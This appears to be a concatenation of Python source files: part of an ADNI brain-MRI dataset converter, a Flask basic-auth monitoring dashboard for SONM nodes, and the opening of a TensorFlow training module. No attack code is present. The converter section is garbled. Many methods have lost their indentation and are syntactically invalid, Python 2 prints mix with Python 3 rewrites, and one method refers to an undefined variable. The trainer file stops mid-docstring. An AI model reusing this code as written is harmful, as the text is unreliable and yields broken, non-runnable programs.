        # NOTE(review): only the sizeFile computed for the *last* merge group
        # (and last matching format letter) survives this loop and is used for
        # the size cap below — TODO confirm that is intended.
        for mergeGroup in self.merge:
            if ("V" in self.outformat):
                sizeFile = self.out_folder[mergeGroup] + self.file_stem + \
                    self.out_dict['V']['filesuffix']
            if ("C" in self.outformat):
                sizeFile = self.out_folder[mergeGroup] + self.file_stem + \
                    self.out_dict['C']['filesuffix']
            if ("W" in self.outformat):
                sizeFile = self.out_folder[mergeGroup] + self.file_stem + \
                    self.out_dict['W']['filesuffix']
        # One writer process serializes all output; workers only compute.
        writer = mp.Process(
            target=self.__outputProcess__, args=(q, sizeFile, maxSize, p))
        writer.start()
        for xmlFile in self.allFiles:
            p.apply_async(
                self.__workerProcess__, args=(xmlFile, q, sizeFile, maxSize))
        p.close()
        p.join()  # Wait for all child processes to close.
        writer.join()
        print 'CONVERSION DONE!\n'
def __outputProcess__(self, queue, sizeFile, maxSize, pool):
"""Listen for messages on queue. Perform all writing of output."""
print'\nWriting spec-files...'
if ("V" in self.outformat):
self.writeCsvHeader()
print 'Wrote ".csv" header.'
if ("C" in self.outformat):
self.writeNames()
print 'Wrote ".names" file.'
if ("W" in self.outformat):
self.writeArffHeader()
print 'Wrote ".arff " file HEADER.'
print '\nStarting conversion of', self.allFiles.__len__(), \
'NIfTI images.\n'
images_used = 0
buffer = {}
while 1:
m = pickle.loads(queue.get())
if m == 'STOP':
# SHOULDN'T THIS BE POOL INSTEAD?
p.terminate()
break
current_image = images_used + 1
if m['file_index'] != current_image:
# save queue object in buffer if not current index
buffer[m['file_index']] = m
else:
if os.path.getsize(sizeFile) < maxSize:
self.writeLine(m['data'], m['file_object'])
print 'Converted and wrote image', m['file_index'], 'of',\
self.allFiles.__len__(), "- Largest size-constricted \
output-file", self.__greek__(os.path.getsize(sizeFile)) + "B /",\
self.__greek__(maxSize) + "B."
images_used += 1
if os.path.getsize(sizeFile) >= maxSize:
queue.put('STOP')
break
else:
current_image += 1
while current_image in buffer:
m = buffer[current_image]
self.writeLine(m['data'], m['file_object'])
print 'Converted and wrote image', m['file_index'], 'of', self.allFiles.__len__(), "- Largest size-constricted output-file", self.__greek__(os.path.getsize(sizeFile)) + "B /", self.__greek__(maxSize) + "B."
del buffer[current_image]
images_used += 1
current_image += 1
if os.path.getsize(sizeFile) >= maxSize:
queue.put('STOP')
break
if ("DEBUG" in self.outformat):
for mergeGroup in self.merge:
self.log(
mergeGroup, self.prettyFormat(
self.parseXml(xmlFile)))
else:
queue.put('STOP')
break
if current_image > self.allFiles.__len__():
queue.put('STOP')
break
self.logRun(self.allFiles.__len__(), images_used)
print "Processed and wrote", images_used, "files and lines in total."
def __workerProcess__(self, xmlFile, queue, sizeFile, maxSize):
"""Perform all data processing. Write results to queue."""
if os.path.getsize(sizeFile) < maxSize:
filei = self.allFiles.index(xmlFile) + 1
fileo = self.parseXml(xmlFile)
result = {'data': self.processData(
fileo), 'file_index': filei, 'file_object': fileo}
if os.path.getsize(sizeFile) < maxSize:
# pickle numpy-array as binary data to increase performance
queue.put(pickle.dumps(result, protocol=-1))
else:
queue.put("STOP")
else:
queue.put("STOP")
def __greek__(self, size):
"""Return a string representing the greek/metric suffix of a size."""
# http://www.gossamer-threads.com/lists/python/python/18406
abbrevs = [
(1 << 50L, 'P'),
(1 << 40L, 'T'),
(1 << 30L, 'G'),
(1 << 20L, 'M'),
(1 << 10L, 'k'),
(1, '')
]
for factor, suffix in abbrevs:
if size > factor:
break
return ("%.2f" % float((size / factor))) + ' ' + suffix
    def getInfo(self):
        """Output visits from ADNI.

        Scans the input folder's XML metadata and prints, side by side, how
        many subjects fall into each visit identifier and each DX group.
        """
        visit_groups = {}  # visit identifier -> subject count
        dx_groups = {}     # DX group label  -> subject count
        print "Scanning input folder for XML-files..."
        xml_files = self.getXmlFilesInFolder(self.input_folder)
        print "Counting subjects in visit and diagnostic groups...\n"
        for xml_file in xml_files:
            tree = ET.parse(xml_file)
            root = tree.getroot()
            visit = root.find(".//*visitIdentifier").text
            dx = root.find(".//*[@item='DX Group']").text
            if visit not in visit_groups:
                visit_groups.update({visit: 0})
            visit_groups.update({visit: (visit_groups[visit] + 1)})
            if dx not in dx_groups:
                dx_groups.update({dx: 0})
            dx_groups.update({dx: (dx_groups[dx] + 1)})
        i = 0
        # Order visits by name prefix plus trailing month digits; DX groups
        # reverse-alphabetically.
        visit_groups = collections.OrderedDict(
            sorted(visit_groups.items(), key=lambda x: (x[0][0:6], x[0][-2:])))
        dx_groups = collections.OrderedDict(
            reversed(sorted(dx_groups.items())))
        # Print the two tallies in parallel columns, padding the shorter one.
        for e1, e2 in list(izip_longest(visit_groups.items(),
                                        dx_groups.items(), fillvalue=('', '')
                                        )):
            print i, ":", e1[0], "\t", e1[1], "\t\t\t | ", e2[0], "\t", e2[1]
            i += 1
        print ""
def writeArffHeader(self):
"""Write header for Arff-file (WEKA)."""
for mergeGroup in self.merge:
with open(self.out_folder[mergeGroup] + self.file_stem + ".arff",
'w') as nfile:
nfile.write('@RELATION ADNI\n\n')
# nfile.write('@ATTRIBUTE ID string\n')
# nfile.write('@ATTRIBUTE age numeric\n')
# nfile.write('@ATTRIBUTE sex {M,F}\n')
# nfile.write('@ATTRIBUTE "APOE A1" integer\n')
# nfile.write('@ATTRIBUTE "APOE A2" integer\n')
# nfile.write('@ATTRIBUTE "MMSE Total Score" numeric\n\n')
# for number in range final resolution (192, 192, 160)
# each slice reduced to X components and using every Nth slice:
# THIS NEEDS TO TAKE VALUES FROM command line parameters etc.
for number in range((self.new_dimensions[0]) *
self.new_dimensions[1] *
self.new_dimensions[2]):
nfile.write(
'@ATTRIBUTE "pixel ' + str(number + 1) + '" real\n')
nfile.write(
'@ATTRIBUTE diagnosis {' + self.merge_dict[mergeGroup] +
'}\n')
nfile.write('\n@DATA\n')
def writeNames(self):
"""Write Names-file (C5.0)."""
for mergeGroup in self.merge:
with open(self.out_folder[mergeGroup] + self.file_stem + ".names",
'w') as nfile:
nfile.write('diagnosis. | target attribute\n\n')
# nfile.write('ID: label.\n')
# nfile.write('age: continuous.\n')
# nfile.write('sex: M, F.\n')
# nfile.write('APOE A1: discrete 4.\n')
# nfile.write('APOE A2: discrete 4.\n')
# nfile.write('MMSE Total Score: continuous.\n\n')
# for number in range final resolution (192, 192, 160),
# each slice reduced to X components and using every Nth slice:
# THIS NEEDS TO TAKE VALUES FROM command line parameters etc.
nfile.write(
'diagnosis: ' + self.merge_dict[mergeGroup] +
'.\n')
for number in range((self.new_dimensions[0]) *
self.new_dimensions[1] *
self.new_dimensions[2]):
nfile.write(
'pixel ' + str(number + 1) + ': continuous.\n')
def writeCsvHeader(self):
    """Write the CSV column header: 'diagnosis' plus one pixel column.

    Bug fix: the original removed the trailing comma with
    ``seek(-1, os.SEEK_END)`` + ``truncate()`` on a text-mode file,
    which raises ``io.UnsupportedOperation`` under Python 3 (nonzero
    end-relative seeks are only allowed in binary mode).  Building the
    header with ``join`` produces byte-identical output without the
    seek hack.
    """
    count = (self.new_dimensions[0] *
             self.new_dimensions[1] *
             self.new_dimensions[2])
    columns = ['diagnosis'] + ['pixel_%d' % (i + 1) for i in range(count)]
    header = ','.join(columns) + '\n'
    for scheme in self.merge:
        with open(self.out_folder[scheme] + self.file_stem + ".csv",
                  'w') as csvf:
            csvf.write(header)
def getXmlFilesInFolder(self, folder):
    """Return the paths of all XML files directly inside `folder`.

    Non-recursive.  Bug fix: results are now joined against the folder
    that was actually listed -- the original joined against
    ``self.input_folder``, producing paths to files that need not exist
    whenever the two directories differ.
    """
    return [os.path.join(folder, name)
            for name in os.listdir(folder)
            if name.endswith(".xml")]
def filterFiles(self, xmls, visits):
    """Drop XML files whose visit identifier is outside the wanted range.

    :param xmls: paths of candidate XML metadata files
    :param visits: highest index (inclusive) into ``self.visits_dict``
        whose visit label should be accepted
    :return: the accepted subset of ``xmls``

    Fixes: Python-2-only print statements replaced with the
    cross-compatible function form; the XPath lookup is now done once
    per file instead of once per visit; a file can no longer be
    appended twice when visit labels repeat.

    NOTE(review): the fast path tests ``self.visits`` while the loop
    honours the ``visits`` parameter -- presumably both always carry
    the same value; confirm with callers.
    """
    print("Filtering through %d XMLs..." % len(xmls))
    if self.visits == 6:
        relevant_xmls = xmls
    else:
        relevant_xmls = []
        allowed = [self.visits_dict[j] for j in range(visits + 1)]
        for xf in xmls:
            root = ET.parse(xf).getroot()
            if root.find(".//*visitIdentifier").text in allowed:
                relevant_xmls.append(xf)
    print("Using %d XMLs." % len(relevant_xmls))
    return relevant_xmls
def parseXml(self, xml_file):
    """Extract the diagnosis group and NIfTI path for one XML file.

    :param xml_file: path of an ADNI metadata XML file
    :return: dict with 'DX Group' and 'Nifti File' keys, or None when
        parsing fails (callers must handle the None case)

    Fixes: the bare ``except:`` (which even swallowed KeyboardInterrupt)
    is narrowed to ``Exception``; the parse itself is now covered by the
    handler; the Python-2 print statement is replaced; the error message
    now shows the exception instance rather than just its class.
    """
    try:
        root = ET.parse(xml_file).getroot()
        return {'DX Group': self.getDxGroup(root),
                'Nifti File': self.getNiftiFile(root)}
    except Exception as exc:
        print("Error parsing: %s" % exc)
        return None
def getId(self, root):
        """Get subject ID from XML (root) element.

        Raises AttributeError if the element is absent (find() -> None).
        """
        # NOTE(review): ".//*subjectIdentifier" relies on lenient
        # ElementPath handling in this ElementTree version -- confirm.
        return root.find(".//*subjectIdentifier").text
def getAge(self, root):
        """Get subject age (as the raw text string) from XML (root) element."""
        return root.find(".//*subjectAge").text
def getSex(self, root):
        """Get subject sex from XML (root) element.

        Presumably 'M' or 'F' (see the commented ARFF header) -- confirm.
        """
        return root.find(".//*subjectSex").text
def getApoeA1(self, root):
        """Get subject APOE A1 allele value from XML (root) element."""
        # Matched by the element's item="APOE A1" attribute.
        return root.find(".//*[@item='APOE A1']").text
def getApoeA2(self, root):
        """Get subject APOE A2 allele value from XML (root) element."""
        # Matched by the element's item="APOE A2" attribute.
        return root.find(".//*[@item='APOE A2']").text
def getMmseScore(self, root):
        """Get subject MMSE Total Score from XML (root) element."""
        # Note: keyed by attribute='MMSCORE', unlike the item= keys above.
        return root.find(".//*[@attribute='MMSCORE']").text
def getDxGroup(self, root):
        """Get subject diagnostic group from XML (root) element.

        Observed values elsewhere in this file: 'Normal', 'MCI',
        'LMCI', 'AD' (see mergeGroups / labelToInt).
        """
        return root.find(".//*[@item='DX Group']").text
def getNiftiFile(self, root):
    """Locate the single .nii file belonging to the scan described by `root`.

    Builds an fnmatch pattern from the subject/series/image identifiers
    and searches ``self.input_folder`` recursively.  Terminates the
    program (exit code 1) unless exactly one match is found.

    Fixes: Python-2 prints; the original messages used backslash line
    continuations *inside* the string literals, so the printed text
    contained the source indentation; ``matches.__len__()`` replaced by
    ``len(matches)``; bare ``exit()`` replaced by ``sys.exit()``.
    """
    subject = root.find(".//*subjectIdentifier").text
    series = root.find(".//*seriesIdentifier").text
    image_uid = root.find(".//*imageUID").text
    pattern = ('ADNI_' + subject + '_*_' + 'S' + series +
               '_' + 'I' + image_uid + '.nii')
    matches = []
    for dirpath, _dirnames, filenames in os.walk(self.input_folder):
        for filename in fnmatch.filter(filenames, pattern):
            matches.append(os.path.join(dirpath, filename))
    if len(matches) != 1:
        kind = 'no' if not matches else 'more than one'
        print('There was %s corresponding .nii match using the following '
              'pattern:' % kind)
        print(pattern)
        print('Exiting...')
        sys.exit(1)
    return matches[0]
def mergeGroups(self, scheme, group):
    """Map a raw DX group label onto the label set of merge `scheme`.

    Scheme 0/None: unchanged; 1: LMCI -> MCI; 2: Normal vs Other;
    3: MCI (LMCI folded in) vs Other; 4: AD vs Other.
    Unknown schemes print a warning and return `group` unchanged.

    Fix: the Python-2 print statement is replaced with the function
    form (identical output on both interpreters); the scheme-3 nesting
    is flattened to an equivalent elif chain.
    """
    if scheme == 0 or scheme is None:
        pass
    elif scheme == 1:
        if group == 'LMCI':
            group = 'MCI'
    elif scheme == 2:
        if group != 'Normal':
            group = 'Other'
    elif scheme == 3:
        if group == 'LMCI':
            group = 'MCI'
        elif group != 'MCI':
            group = 'Other'
    elif scheme == 4:
        if group != 'AD':
            group = 'Other'
    else:
        print("Failed to merge into another group.")
    return group
def prettyFormat(self, current_file):
    """Print a human-readable summary of one parsed record (debug aid).

    Fix: ported from Python-2 print statements; the double space
    reproduces the separator the old comma form inserted after the
    label's trailing space.
    """
    print("DX Group:  %s" % current_file['DX Group'])
    print("Nifti File:  %s" % current_file['Nifti File'])
def log(self, mergeGroup, message):
    """Append `message` (stringified) to this merge group's .log file."""
    log_path = self.out_folder[mergeGroup] + self.file_stem + ".log"
    with open(log_path, 'a') as handle:
        handle.write(str(message))
def resize(self, img, new_resolution):
    """Zoom a 3-D image array to `new_resolution` via spline interpolation.

    :param img: 3-D numpy array of voxel intensities
    :param new_resolution: target (x, y, z) shape
    :return: resampled array of shape `new_resolution`

    Fix: call ``nd.zoom`` directly -- the ``scipy.ndimage.interpolation``
    submodule has been deprecated for years and is removed in recent
    SciPy releases; ``zoom`` itself is unchanged.
    """
    dsfactor = [w / float(f) for w, f in zip(new_resolution, img.shape)]
    return nd.zoom(img, zoom=dsfactor)
def labelToInt(self, label, scheme):
    """Translate a (post-merge) label string into its class-index string.

    :param label: DX group label after mergeGroups() was applied
    :param scheme: merge scheme id (None is treated like 0)
    :return: the class index as a string, e.g. '0'

    Exits the program with status 1 for any label that is not part of
    the scheme's label set, or for an unknown scheme -- mirroring the
    original fail-fast behaviour.  The 50-line if/elif ladder is
    replaced by per-scheme lookup tables, and the Python-2 print
    statement by the cross-compatible function form.
    """
    tables = {
        0: {'Normal': '0', 'MCI': '1', 'LMCI': '2', 'AD': '3'},
        1: {'Normal': '0', 'MCI': '1', 'AD': '2'},
        2: {'Normal': '0', 'Other': '1'},
        3: {'Other': '0', 'MCI': '1'},
        4: {'Other': '0', 'AD': '1'},
    }
    key = 0 if scheme is None else scheme
    try:
        return tables[key][label]
    except KeyError:
        print("Failed to merge into another group.")
        sys.exit(1)
def maybeReduceDimensionality(self, img_data):
        """Dimensional reduction of 3D image matrix (numpy array).

        First subsamples the slices (every ``self.n_slices``-th along
        the first axis), then optionally reduces each slice according
        to ``self.reduction``: None (passthrough), "H" (histogram of
        min-max-scaled intensities) or "P" (per-slice randomized PCA).
        """
        # [::n] subsamples along the FIRST axis (data[i, :, :]).
        img_data = img_data[::self.n_slices]
        if self.reduction is None:
            """No Reduction"""
            return img_data
        elif self.reduction == "H":
            """Histogram"""
            from sklearn import preprocessing
            # Flatten, rescale to [0, 1], then histogram the intensities
            # into reduction_dict["H"]["value"] bins; only counts are kept.
            img_data = np.asarray(img_data, dtype=float).flat
            min_max_scaler = preprocessing.MinMaxScaler()
            scaled_data = min_max_scaler.fit_transform(img_data)
            # NOTE(review): `normed=` was removed from np.histogram in
            # NumPy 1.24 -- this call needs an older NumPy; confirm.
            hist = np.histogram(scaled_data,
                                bins=self.reduction_dict["H"]["value"],
                                range=None, normed=False, weights=None,
                                density=None)[0]
            return hist.reshape(1, hist.shape[0])
        elif self.reduction == "P":
            """Slice-wise (randomized) Principal Component Analysis"""
            # NOTE(review): RandomizedPCA was removed from scikit-learn
            # (0.20+); modern code would use PCA(svd_solver='randomized').
            from sklearn.preprocessing import normalize
            from sklearn.decomposition import RandomizedPCA
            proj_data = []
            for img_slice in img_data:
                norm_data = normalize(img_slice)
                # shaped_data is computed but never used afterwards.
                shaped_data = np.reshape(norm_data, norm_data.size)
                # shaped_data.shape
                rpca = RandomizedPCA(
                    n_components=self.reduction_dict["P"]["value"],
                    random_state=0)
                # Fit/transform operates on the 2-D slice, not shaped_data.
                proj_slice = rpca.fit_transform(norm_data)
                # plt.imshow(proj_data)
                # feat_data = rpca.inverse_transform(proj_data)
                # plt.imshow(feat_data)
                # plt.imshow(norm_data)
                proj_data.append(proj_slice)
            return proj_data
def processData(self, current_file):
        """Load, resize and (optionally) reduce one NIfTI volume.

        :param current_file: record dict holding the 'Nifti File' path
        :return: whatever maybeReduceDimensionality() yields for the
            resized volume
        """
        # NOTE(review): Image.get_data() is deprecated in nibabel 3+
        # in favour of get_fdata() -- confirm the pinned nibabel version.
        return self.maybeReduceDimensionality(self.resize(nib.load(
            current_file['Nifti File']).get_data(), self.new_resolution))
def writeLine(self, img_data, current_file):
        """Write image data as line in dataset file(s).

        Appends one sample row per (merge scheme, output format) pair:
        label first (except WEKA/'W', where it goes last; integer label
        for 'V'), then the voxel values scaled by 1e6 and truncated to
        int.  Also tallies the per-scheme diagnosis counts in
        ``self.dx_groups``.
        """
        for mergeGroup in self.merge:
            # `format` shadows the builtin; kept for byte-compatibility.
            for format in self.outformat:
                output_file = self.out_folder[mergeGroup] + self.file_stem + \
                    self.out_dict[format]['filesuffix']
                output_format = self.out_dict[format]['fileformat']
                with open(output_file, "a") as myfile:
                    # myfile.write(current_file['ID'] + ',' + \
                    # current_file['Age'] + ',' + current_file['Sex'] + \
                    # ',' + current_file['APOE A1'] + ',' + \
                    # current_file['APOE A2'] + ',')
                    if (format != 'W'):
                        if (format == 'V'):
                            # 'V' wants the numeric class index as label.
                            myfile.write(
                                str(self.labelToInt(self.mergeGroups(
                                    mergeGroup, current_file['DX Group']), mergeGroup)) +
                                ',')
                        else:
                            myfile.write(
                                self.mergeGroups(mergeGroup,
                                                 current_file['DX Group']) +
                                ',')
                    i = 0
                    for data_slice in img_data:
                        # Fixed-point encode: scale by 1e6, truncate to int.
                        np.savetxt(myfile, (data_slice * (10**6)).astype(int),
                                   delimiter=",", newline=',', fmt="%d")  # s/f
                        i += 1
                    # hack to remove single (illegal[?]) comma on end of line
                    # (MAY NOT WORK ON ALL PLATFORMS [i.e. Windows])
                    # NOTE(review): this nonzero end-relative seek is only
                    # legal on Python 2 text files; Python 3 raises here.
                    myfile.seek(-1, os.SEEK_END)
                    myfile.truncate()
                    if (format == 'W'):
                        # WEKA/ARFF rows carry the class label last.
                        myfile.write(
                            ',' + self.mergeGroups(mergeGroup,
                                                   current_file['DX Group']))
                    myfile.write('\n')
            # Per-scheme tally of how many samples each DX group got.
            group = self.mergeGroups(mergeGroup, current_file['DX Group'])
            if group not in self.dx_groups[mergeGroup]:
                self.dx_groups[mergeGroup].update({group: 0})
            self.dx_groups[mergeGroup].update(
                {group: (self.dx_groups[mergeGroup][group] + 1)})
def logRun(self, total_files, images_used):
    """Write a summary of the finished conversion to every group's log.

    :param total_files: number of .nii files the run started with
    :param images_used: number of sample lines actually written

    Fix: ``xrange`` and ``dict.iteritems`` are Python-2-only; replaced
    with ``range`` and ``dict.items`` (same behaviour under Python 2).
    The format list is built with a comprehension.  All log text is
    byte-identical to the original.
    """
    for mergeGroup in self.merge:
        self.log(mergeGroup, "CONVERSION INFORMATION:\n\n")
        dict_forms = [self.out_dict[fmt]['fileformat']
                      for fmt in self.outformat]
        ofs = ' + '.join(str(p) for p in dict_forms)
        self.log(mergeGroup, "Started out using " + str(total_files) +
                 " .nii files.\n")
        if self.max_size is not None:
            # (sic) "ouput" kept to preserve the historical log text.
            self.log(mergeGroup,
                     "Stopped conversion when largest ouput file reached "
                     + str(self.max_size) + "GiB.\n")
        self.log(mergeGroup,
                 "Wrote " + str(images_used) + " lines in total.\n")
        self.log(mergeGroup, "Resized all NIfTI MR Images to " +
                 str(self.new_resolution) +
                 " (lowest resolution in set).\n\n")
        self.log(mergeGroup, "Included visits:\n")
        for x in range(0, self.visits + 1):
            self.log(mergeGroup, self.visits_dict[x] + "\n")
        self.log(mergeGroup, "\nUsed every " + str(self.n_slices) +
                 " slice(s).\n")
        if self.reduction is not None:
            self.log(mergeGroup, "Reduced dimensionality of each slice to "
                     + str(self.reduction_dict[self.reduction]["value"]) +
                     " components/bins via method " +
                     str(self.reduction_dict[self.reduction]["name"]) +
                     ".\n")
        self.log(mergeGroup, "Converted to " + ofs + " format(s).\n")
        self.log(mergeGroup, "Final resolution was (" +
                 str(self.new_dimensions[0]) +
                 ", " + str(self.new_dimensions[1]) +
                 ", " + str(self.new_dimensions[2]) + ").\n")
        self.log(mergeGroup, "DX Groups after (eventual) merging: " +
                 self.merge_dict[mergeGroup] + ".\n")
        self.log(mergeGroup, "\nSubjects in diagnostic groups:\n")
        groups = collections.OrderedDict(
            sorted(self.dx_groups[mergeGroup].items(), key=lambda t: t[0]))
        for k, v in groups.items():
            self.log(mergeGroup, k + "\t" + str(v) + "\n")
if __name__ == '__main__':
    """Run only if the script is called explicitly."""
    # NOTE(review): constructing the converter apparently drives the whole
    # conversion from __init__ (the instance is never used afterwards) --
    # confirm against the class definition.
    obj = AdniConverter()
|
http_server.py | import logging
import threading
import time
from collections import defaultdict
from functools import wraps
from flask_table import Table, Col
from flask import Flask, render_template, request, Response
from flask_bootstrap import Bootstrap
from source.utils import Nodes
from source.config import Config
logger = logging.getLogger("monitor")
class SonmHttpServer:
    """Namespace for the HTTP server's shared state."""
    # Cooperative shutdown flag: another thread sets this to False to make
    # run_http_server()'s supervision loop exit.
    KEEP_RUNNING = True
def check_auth(username, password):
    """Return True iff the basic-auth credentials match the configuration."""
    conf = Config.base_config["http_server"]
    return (username, password) == (conf["user"], conf["password"])
def authenticate():
    """Build the 401 response that challenges the client for basic auth."""
    message = ('Could not verify your access level for that URL.\n'
               'You have to login with proper credentials')
    headers = {'WWW-Authenticate': 'Basic realm="Login Required"'}
    return Response(message, 401, headers)
def requires_auth(f):
    """Decorator: serve the view only when basic auth succeeds, else 401."""
    @wraps(f)
    def decorated(*args, **kwargs):
        credentials = request.authorization
        if credentials and check_auth(credentials.username,
                                      credentials.password):
            return f(*args, **kwargs)
        return authenticate()
    return decorated
class NodesTable(Table):
    """flask_table declarative table: one row per monitored node."""
    def sort_url(self, col_id, reverse=False):
        # Sorting is disabled; flask_table only requires the hook to exist.
        pass
    def get_tr_attrs(self, item):
        # Per-row CSS class comes from the rendered item itself.
        return {'class': item.css_class}
    # Declaration order below is the rendered column order.
    node = Col('Node')
    order_id = Col('Order id')
    order_price = Col('Order Price')
    deal_id = Col('Deal id')
    task_id = Col('Task id')
    task_uptime = Col('Task uptime')
    node_status = Col('Node status')
    since_hb = Col('HB')  # seconds since last heartbeat, presumably -- confirm
def create_app():
    """Build the Flask app serving the single monitoring dashboard page.

    :return: configured Flask application with one auth-protected route
    """
    app = Flask(__name__)
    Bootstrap(app)
    @app.route('/', methods=('GET', 'POST'))
    @requires_auth
    def index():
        nodes_content = []
        # Group nodes by their tag so each tag renders as its own table.
        groups = defaultdict(list)
        for obj in Nodes.get_nodes_arr():
            groups[obj.tag].append(obj)
        nodes_content = [{
            'node_tag': tag,
            'predicted_price': Config.formatted_price_for_tag(tag),
            'nodes_table': NodesTable([node.as_table_item for node in nodes],
                                      classes=['table', 'table-striped', 'table-bordered'])
        }
            for tag, nodes in groups.items()]
        return render_template('index.html', nodes=nodes_content, token_balance=Config.balance)
    return app
def run_http_server():
    """Start and babysit the monitoring HTTP server.

    Blocks until ``SonmHttpServer.KEEP_RUNNING`` turns False, restarting
    the server thread whenever it dies.  Does nothing when the config
    has no "http_server" section or disables it; refuses to start
    without credentials.

    Bug fix: a config *without* an "http_server" section used to crash
    with KeyError at the credentials check instead of skipping the
    server.
    """
    if "http_server" not in Config.base_config:
        return
    http_conf = Config.base_config["http_server"]
    if "run" in http_conf and not http_conf["run"]:
        return
    if not ("password" in http_conf and "user" in http_conf):
        logger.error("Login and password are mandatory parameters for http server.")
        logger.error("Http server stopped")
        return
    logger.info('Starting HTTP server...')
    thread = get_http_thread(create_app())
    logger.info("Agent started on port: {}".format(http_conf["port"]))
    while SonmHttpServer.KEEP_RUNNING:
        if not thread.is_alive():
            # The worker died (e.g. unhandled exception) -- restart it.
            thread = get_http_thread(create_app())
        time.sleep(1)
    logger.info("Http server stopped")
def get_http_thread(app, host='0.0.0.0', port=8081):
    """Run `app.run(host, port)` on a new daemon thread and return it."""
    worker = threading.Thread(target=app.run,
                              kwargs=dict(host=host, port=port))
    worker.daemon = True  # must not block interpreter shutdown
    worker.start()
    return worker
|
trainer.py | import os
import pickle
import shutil
import time
from datetime import datetime
from os.path import exists, join, relpath
from threading import Thread
from typing import List, Union, Optional, Dict, Tuple
import numpy as np
import tensorflow as tf
from tensorflow.python.training.adadelta import AdadeltaOptimizer
from tensorflow.python.training.adam import AdamOptimizer
from tensorflow.python.training.momentum import MomentumOptimizer
from tensorflow.python.training.rmsprop import RMSPropOptimizer
from hotpot import configurable
from hotpot.configurable import Configurable
from hotpot.data_handling.dataset import TrainingData, Dataset
from hotpot.elmo.lm_model import load_elmo_pretrained_token_embeddings
from hotpot.evaluator import Evaluator, Evaluation, AysncEvaluatorRunner, EvaluatorRunner
from hotpot.model import Model
from hotpot.model_dir import ModelDir
"""
Contains the train-loop and test-loop for our models
"""
class ExponentialDecayWrapper(object):
    """Picklable factory for ``tf.train.exponential_decay`` schedules.

    Stores only plain hyper-parameters so the schedule can be recreated
    after unpickling instead of holding live graph tensors.
    """

    def __init__(self, decay_steps, decay_rate, staircase=False):
        self.decay_steps = decay_steps
        self.decay_rate = decay_rate
        self.staircase = staircase

    def __call__(self, learning_rate, global_step, name=None):
        """Build the decayed learning-rate tensor for the given base rate."""
        return tf.train.exponential_decay(learning_rate=learning_rate,
                                          global_step=global_step,
                                          decay_steps=self.decay_steps,
                                          decay_rate=self.decay_rate,
                                          staircase=self.staircase,
                                          name=name)
class ReduceLROnPlateau(object):
    """Reduce the 'opt/lr' variable when a monitored scalar plateaus."""
    def __init__(self, dev_name, scalar_name, factor=0.1, patience=10, verbose=0, mode='min', terminate_th=1e-5):
        """
        More or less like the Keras callback.
        :param dev_name: name of evaluation dataset
        :param scalar_name: name of scalar to monitor
        :param factor: new_lr = lr * factor
        :param patience: number of evaluations with no improvement after which learning rate will be reduced
        :param verbose: 0: quiet, 1: update messages
        :param mode: one of {'min', 'max'}. direction in which we want the scalar to improve.
        :param terminate_th: stop training below this value of LR (None disables the check).
        """
        self.terminate_th = terminate_th
        self.dev_name = dev_name
        self.scalar_name = scalar_name
        self.factor = factor
        self.patience = patience
        self.verbose = verbose
        if mode not in ['min', 'max']:
            raise ValueError(f"mode needs to be either 'min' or 'max', got {mode}")
        self.mode = mode
        self.best = None        # best scalar value seen so far
        self.counter = 0        # evaluations since last improvement
        self.lr_update_op = None  # graph ops -- created by build_ops()
        self.lr_val_op = None
    def build_ops(self):
        """Create the lr read/update ops; call after the optimizer made 'opt/lr'."""
        with tf.variable_scope('opt', reuse=True):
            lr = tf.get_variable('lr')
            self.lr_val_op = lr
            self.lr_update_op = lr.assign(tf.multiply(lr, self.factor))
    def _improved(self, scalar) -> bool:
        # First observation always counts as an improvement.
        if self.best is None:
            return True
        return scalar > self.best if self.mode == 'max' else scalar < self.best
    def _update_lr(self, sess: tf.Session):
        sess.run(self.lr_update_op)
    def terminate(self, sess: tf.Session) -> bool:
        """Return True when the current LR has fallen below terminate_th."""
        if self.terminate_th is None:
            return False
        lr = sess.run(self.lr_val_op)
        return lr <= self.terminate_th
    def __call__(self, updated_scalar_value, sess: tf.Session):
        """Feed one new monitored value; may trigger an LR reduction."""
        if self._improved(updated_scalar_value):
            self.best = updated_scalar_value
            self.counter = 0
        else:
            self.counter += 1
            if self.counter >= self.patience:
                self._update_lr(sess)
                self.counter = 0
                if self.verbose:
                    print("Reduced LR!")
    def __getstate__(self):
        # Drop live tf ops so the object stays picklable; build_ops()
        # must be called again after unpickling.
        state = self.__dict__.copy()
        state["lr_update_op"] = None
        state["lr_val_op"] = None
        return state
class SerializableOptimizer(Configurable):
    """Picklable description of a tensorflow optimizer.

    Records the optimizer name and constructor parameters so the exact
    optimizer can be re-created after unpickling (live tf ops are
    stripped from the pickled state).
    """

    def __init__(self, opt_name, params=None):
        """
        :param opt_name: one of "Adam", "Adadelta", "RMSprop", "Momentum"
        :param params: constructor kwargs; must contain 'learning_rate'

        Bug fix: passing the default ``params=None`` used to raise
        ``TypeError`` (``'learning_rate' not in None``) instead of the
        intended ValueError.
        """
        if params is None or 'learning_rate' not in params:
            raise ValueError("Must include learning rate")
        self.params = params
        self.opt_name = opt_name
        self.lr_op = None  # set lazily by get(); never pickled

    def get_params(self):
        return dict(opt_name=self.opt_name, params=self.params)

    def get(self, name=None, lr_decay=None, global_step=None):
        """Instantiate the tf optimizer, backing its LR with an 'opt/lr' variable."""
        params = self.params.copy()
        with tf.variable_scope('opt'):
            lr_tensor = tf.get_variable('lr', dtype=tf.float32,
                                        initializer=tf.constant(params['learning_rate']),
                                        trainable=False)
        if lr_decay is not None:
            params['learning_rate'] = lr_decay(learning_rate=params['learning_rate'],
                                               global_step=global_step,
                                               name='lr_decay')
        # With decay, 'opt/lr' tracks the decayed value via an assign op.
        self.lr_op = lr_tensor if lr_decay is None else lr_tensor.assign(params['learning_rate'])
        params['learning_rate'] = self.lr_op
        optimizers = {
            "Adam": AdamOptimizer,
            "Adadelta": AdadeltaOptimizer,
            "RMSprop": RMSPropOptimizer,
            "Momentum": MomentumOptimizer,
        }
        if self.opt_name not in optimizers:
            # Bug fix: was `raise NotImplemented()` -- NotImplemented is a
            # constant, not an exception type, and is not even callable.
            raise NotImplementedError(self.opt_name)
        opt_cls = optimizers[self.opt_name]
        return opt_cls(**params) if name is None else opt_cls(name=name, **params)

    def __getstate__(self):
        # Strip the live tf op before pickling.
        state = self.__dict__.copy()
        state["lr_op"] = None
        return state

    def __setstate__(self, state):
        # Older pickles predate lr_op; default it in.
        if 'lr_op' not in state:
            state['lr_op'] = None
        self.__dict__ = state
def init(out: ModelDir, model: Model, override=False):
    """Save our initial setup into `out`.

    Ensures the save/log directories exist (wiping non-empty ones only
    when ``override`` is set), then dumps the model as human-readable
    JSON and as the authoritative pickle.

